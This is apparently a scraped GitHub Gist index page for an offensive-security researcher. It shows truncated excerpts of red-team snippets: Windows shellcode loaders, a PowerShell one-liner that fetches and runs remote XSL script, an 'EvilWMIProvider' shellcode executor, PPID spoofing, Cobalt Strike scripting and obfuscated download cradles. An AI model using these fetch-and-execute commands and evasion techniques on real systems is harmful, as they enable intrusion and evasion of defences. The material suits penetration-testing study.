Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Offensive Sencha Consultant

Mariusz B. mgeeky

💭
Offensive Sencha Consultant
View GitHub Profile
@mgeeky
mgeeky / Get-AntiVirusProduct.ps1
Created Jan 14, 2021
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
View Get-AntiVirusProduct.ps1
function Get-AntiVirusProduct {
[CmdletBinding()]
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[Alias('name')]
$computername=$env:computername
)
@mgeeky
mgeeky / hexdump.py
Created Jan 3, 2021
Hexdump implementation in Python
View hexdump.py
def hexdump(data, addr = 0, num = 0):
s = ''
n = 0
lines = []
if num == 0: num = len(data)
if len(data) == 0:
return '<empty>'
for i in range(0, num, 16):
@mgeeky
mgeeky / shellcodeLoader.c
Last active Jan 26, 2021
Simplest windows shellcode loader there can be, purely in C
View shellcodeLoader.c
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: ./shellcodeLoader <shellcode64>\n");
return 1;
}
@mgeeky
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
View shellcodeLoader.go
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@mgeeky
mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
View PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
View EvilWMIProvider.cs
// Based On LocalAdmin WMI Provider by Roger Zander
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
// Adapted For Evil By @subTee
// Executes x64 ShellCode
//
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
View PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@mgeeky
mgeeky / httprequest.cna
Last active Apr 7, 2020
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
View httprequest.cna
#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#
import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active Feb 17, 2021
Various Powershell Download Cradles purposed as one-liners
View Download-Cradles-Oneliners.md

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings: